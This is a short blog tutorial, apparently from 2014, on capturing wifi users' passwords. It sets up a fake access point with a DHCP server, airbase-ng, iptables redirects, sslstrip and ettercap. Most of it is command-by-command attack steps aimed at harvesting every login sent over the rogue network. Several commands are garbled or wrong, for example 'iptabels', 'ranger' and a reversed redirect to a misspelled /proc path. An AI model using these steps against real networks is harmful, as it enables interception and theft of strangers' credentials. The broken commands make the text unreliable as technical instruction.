Tuesday, 30 September 2014

0 Capturing All passwords and usernames on a wifi network

In this tutorial we will be doing a MITM attack via a Fake Access Point

That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .

Basically a Rogue Ap is a fake Ap which you can use to do MITM attacks. if you don't know what is an MITM attack, even after the thousands of post, you can read our old post in Learn to hack page .

This method uses a dhcp server. There are other methods which I will cover in another tutorial.



So let's start.

What do you need?

1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode

What do you need to do?

Configure the DHCP Server

1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)

Start the AP

1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL

Configure the Tunnel Interface

1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000

Start DHCP Server

1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start

Starting SSL Strip

1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL

Harvest

1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)

Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP

0 comments:

Post a Comment